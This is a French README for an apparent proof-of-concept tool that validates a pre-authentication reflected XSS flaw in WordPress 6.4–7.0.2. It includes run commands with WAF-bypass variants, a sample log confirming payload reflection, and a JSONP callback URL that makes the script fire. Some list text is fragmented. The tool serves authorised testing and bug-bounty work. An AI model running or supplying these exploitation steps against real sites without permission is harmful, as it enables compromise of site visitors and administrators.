
Valide les XSS réfléchis avant authentification dans WordPress, identifie les versions vulnérables, vérifie la réflexion des payloads et le JSONP, et génère des artefacts de PoC HTML/curl.
Un outil de preuve de concept (PoC) permettant de valider CVE-2026-64638, une vulnérabilité de Cross-Site Scripting (XSS) réfléchi pré-authentification affectant les installations WordPress (versions 6.4 – 7.0.2).
Cet outil automatise le processus d'identification, de validation et de génération d'un PoC pour CVE-2026-64638. Il confirme en toute sécurité si une installation WordPress cible est vulnérable au XSS réfléchi pré-authentification sans déployer de charges utiles malveillantes. Si la cible est confirmée vulnérable, il peut générer un PoC HTML pour des tests de sécurité autorisés et pour son inclusion dans les rapports de bug bounty.
standard, envelope, waf) pour tester différents scénarios de filtrage.readme.html ou les paramètres des scripts mis en file d'attente.wp-login.php est accessible et fonctionnel.wp-login.php et vérifie si les éléments DOM requis (par ex. ajaxurl, color-picker) survivent à l'assainissement dans la réponse.requests>=2.31.0, urllib3Clonez le dépôt et installez les dépendances requises :
git clone https://github.com/your-username/xss2shell-poc.git
cd xss2shell-poc
pip install -r requirements.txt
Cet outil ne nécessite aucune variable d'environnement ni fichier de configuration complexe. Tous les paramètres sont transmis directement via les arguments de la ligne de commande.
Exécutez l'outil avec Python 3 sur une cible autorisée.
python3 xss2shell_poc.py -t https://target.com --check-only
python3 xss2shell_poc.py -t https://target.com
Si la charge utile standard est bloquée par un WAF ou si le point de terminaison REST renvoie une erreur HTTP 401, essayez des variantes alternatives :
python3 xss2shell_poc.py -t https://target.com --variant waf
python3 xss2shell_poc.py -t https://target.com --variant envelope
python3 xss2shell_poc.py -t https://target.com -o custom_poc.html
.
├── .gitignore
├── CONTRIBUTING.md
├── LICENSE
├── README.md
├── SECURITY.md
├── requirements.txt
└── xss2shell_poc.py
Target : https://target.com
Variant : standard
Mode : Full PoC
[>] Phase 1 — WordPress Version Fingerprint
[+] WordPress 7.0.2 — VULNERABLE (6.4 – 7.0.2)
[>] Phase 2 — Confirm Login Page
[+] wp-login.php reachable (HTTP 200)
[>] Phase 3 — Testing XSS Payload (variant: standard)
[+] XSS PAYLOAD SURVIVED SANITIZATION!
[+] Injected DOM elements found in response: ['id="ajaxurl"', 'id="color-picker"']
[>] Phase 4 — REST API JSONP Callback Check
[+] REST JSONP callback works: https://target.com/?rest_route=/&_method=GET&_jsonp=testcb
[+] jQuery will evaluate response as script → XSS fires automatically
Ce dépôt contient des outils de test liés à la sécurité. Veuillez consulter SECURITY.md pour notre politique de divulgation responsable et les exigences d'utilisation autorisée.
Nous accueillons volontiers les contributions professionnelles ! Veuillez consulter CONTRIBUTING.md pour plus de détails sur notre flux de travail, nos normes de qualité du code et nos directives de soumission.
Ce projet est distribué sous la licence MIT.
Réservé à une utilisation autorisée uniquement. Ce projet est fourni strictement pour les tests d'intrusion autorisés, la recherche en sécurité et les programmes de bug bounty pour lesquels une autorisation écrite explicite a été accordée par le propriétaire du système. N'utilisez pas cet outil contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas l'autorisation de tester. Les auteurs et les contributeurs ne sont pas responsables de toute mauvaise utilisation, de tout dommage ou de toute conséquence juridique résultant de l'utilisation de ce logiciel.